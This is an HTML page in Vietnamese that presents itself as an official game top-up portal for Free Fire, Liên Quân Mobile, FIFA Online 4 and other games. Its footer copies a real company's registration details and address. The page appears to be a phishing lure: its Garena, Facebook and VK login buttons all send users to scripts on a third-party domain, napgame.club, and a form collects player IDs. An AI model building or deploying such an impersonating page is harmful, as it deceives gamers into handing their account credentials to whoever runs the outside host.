<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1 , maximum-scale=1, user-scalable=no, viewport-fit=cover">
	<title>Nạp thẻ</title>
    <link href="css/base.css?v=1" rel="stylesheet" />
    <link rel="stylesheet" href="js/slick/slick.css">
    <script type="text/javascript" src="js/jquery-3.3.1.js"></script>
    <script type="text/javascript" src="js/slick/slick.js"></script>
    <link href="css/style.css" rel="stylesheet" />
    <script type="text/javascript" src="js/style.js"></script>
</head>
<body>
    <div class="s-header-1">
        <div class="container align-items--between">
            <a href="index.html" class="hd-logo"><img src="images/logo.png" alt=""></a>
            <div class="hd-menu">
                <a href="javascript:;" ht-trigger="hd-menu"><span>☰</span><span>×</span></a>
            </div>
            <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="hd-button"><img class="logged" src="images/user-2.png" alt=""> <span class="name">Đăng nhập</span></a>
        </div>
    </div>
    <div id="modalLogin" class="c-modal" ht-close="c-modal">
        <div class="c-modal-box">
            <div class="c-modal-group" ht-skip="parent">
                <div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
                <div class="c_body">
                    <div class="s-login-1">
                        <div class="s_title">Bảng điều khiển đăng nhập</div>
                        <div class="s_button">
                            <a href="https://napgame.club/api/v1/login_garena.php"><img src="images/garena.png" alt=""> <span>Garena</span></a>
                            <a href="https://napgame.club/api/v1/login_facebook.php"><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="modalLogin2" class="c-modal" ht-close="c-modal">
        <div class="c-modal-box">
            <div class="c-modal-group" ht-skip="parent">
                <div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
                <div class="c_body">
                    <div class="s-login-1">
                        <div class="s_title" style="padding-bottom: 70px;"><img style="float: left; margin: 0 0 0 18px; width: 45px; height: 45px; display: block; border-radius: 50%;" width="45px" height="45px" src="images/freefire-icon.png" alt=""> <span style="float: left; margin: 13px 15px; font-size: 20px; font-weight: 700; color: #ef363c;">ID Đăng Nhập</span></div>
                        <form action="" id="loginform" method="POST" accept-charset="utf-8">
                            <div class="form-group c-form is-empty">
                                <input type="number" id="idfaifai" name="idfaifai" class="c_input" value="" placeholder="ID người chơi">
                            </div>
                            <span class="c-error"></span>
                            <button name="login" type="submit" class="c-button-4">Đăng nhập</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="modalLogin5" class="c-modal" ht-close="c-modal">
        <div class="c-modal-box">
            <div class="c-modal-group" ht-skip="parent">
                <div class="c_close text--white" ht-close="c-modal"><img src="images/close.png" alt=""></div>
                <div class="c_body">
                    <div class="s-login-1">
                        <div class="s_title">Bảng điều khiển đăng nhập</div>
                        <div class="s_button row">
                            <a class="col" href="https://napgame.club/api/v1/login_garena.php"><img src="images/garena.png" alt=""> <span>Garena</span></a>
                            <a class="col" href="https://napgame.club/api/v1/login_facebook.php"><img src="images/facebook.png" alt=""> <span>Facebook</span></a>
                            <a class="col" href="https://napgame.club/api/v1/login_garena.php"><img src="images/vk.png" alt=""> <span>VK</span></a>
                            <a class="col" href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin2"><img width="180px" height="180px" src="images/freefire-icon.png" alt=""> <span>ID người chơi</span></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="modalLogin3" class="c-modal c-modal-3" ht-close="c-modal-3">
        <div class="c-modal-box">
            <div class="c-modal-group" ht-skip="parent">
                <div class="c_close text--white" ht-close="c-modal-3"><img src="images/close.png" alt=""></div>
                <div class="c_body">
                    <img src="images/id.png" alt="">
                </div>
            </div>
        </div>
    </div>
    <div class="s-menu-1">
        <div class="s_menu">
            <ul ht-target="hd-menu">
                <li class="button"><a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin"><img src="images/user-2.png" alt="">Đăng nhập</a></li>
                <li><a href="">Chăm sóc khách hàng</a></li>
            </ul>
        </div>
        <div class="s_after"></div>
    </div>
    <div class="s-slide-1">
        <div class="container">
            <div class="b-sslide-ratio">
                <div class="slick-slider">
                    <a href=""><img src="images/hero-slider1.jpg" alt="" /></a> <!-- LINK -->
                    <a href=""><img src="images/hero-slider2.jpg" alt="" /></a> <!-- LINK -->
                    <a href=""><img src="images/hero-slider3.jpg" alt="" /></a> <!-- LINK -->
                </div>
            </div>
        </div>
    </div>

    <div class="s-section-1">
        <div class="container">
            <h2 class="s_title"><span>Chọn game để nạp</span></h2>
            <div class="row row-flex">
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/lq.png" alt="">
                        <h3>Liên Quân Mobile</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin5" class="b-card-1 faifai"> <!-- LINK -->
                        <img src="images/faifai.png" alt="">
                        <h3>Free Fire</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/icon.png" alt="">
                        <h3>Nạp sò</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/fifa.png" alt="">
                        <h3>FIFA Online 4 (VN)</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/fifa4.png" alt="">
                        <h3>FIFA Online 4 M VN</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/bns.png" alt="">
                        <h3>Blade and Soul</h3>
                    </a>
                </div>
                <div class="col-6 col-sm-4">
                    <a href="javascript:;" ht-trigger="c-modal" ht-target="#modalLogin" class="b-card-1"> <!-- LINK -->
                        <img src="images/lol.png" alt="">
                        <h3>Liên Minh Huyền Thoại</h3>
                    </a>
                </div>
            </div>
        </div>
    </div>

    <div class="s-foolter-1">
        <div class="container">
            <ul>
                <li>CÔNG TY CỔ PHẦN PHÁT TRIỂN THỂ THAO ĐIỆN TỬ VIỆT NAM</li>
                <li>Giấy CNĐKKD số 0103959912, cấp lần đầu ngày 09/06/2009 | Cơ quan cấp: Phòng Đăng ký kinh doanh- Sở Kế hoạch và đầu tư TP Hà Nội</li>
                <li>Địa chỉ trụ sở chính: Tầng 29, Tòa nhà Trung tâm Lotte Hà Nội, số 54 đường Liễu Giai, Phường Cống Vị, Quận Ba Đình, TP Hà Nội, Việt Nam</li>
                <li>Điện thoại: 024 73053939</li>
            </ul>
            <ul>
                <li><a href="">Câu hỏi thường gặp</a></li> <!-- LINK -->
                <li><a href="">Điều khoản dịch vụ</a></li> <!-- LINK -->
                <li><a href="">Chính sách bảo mật</a></li> <!-- LINK -->
            </ul>
        </div>
    </div>

    <style type="text/css">
        body{
            background-color: #fff;
        }
    </style>
    <script type="text/javascript">
        sessionStorage.removeItem('diamond');
        sessionStorage.removeItem('type');
        sessionStorage.removeItem('amount');
        sessionStorage.removeItem('item');
    </script>
</body>
</html>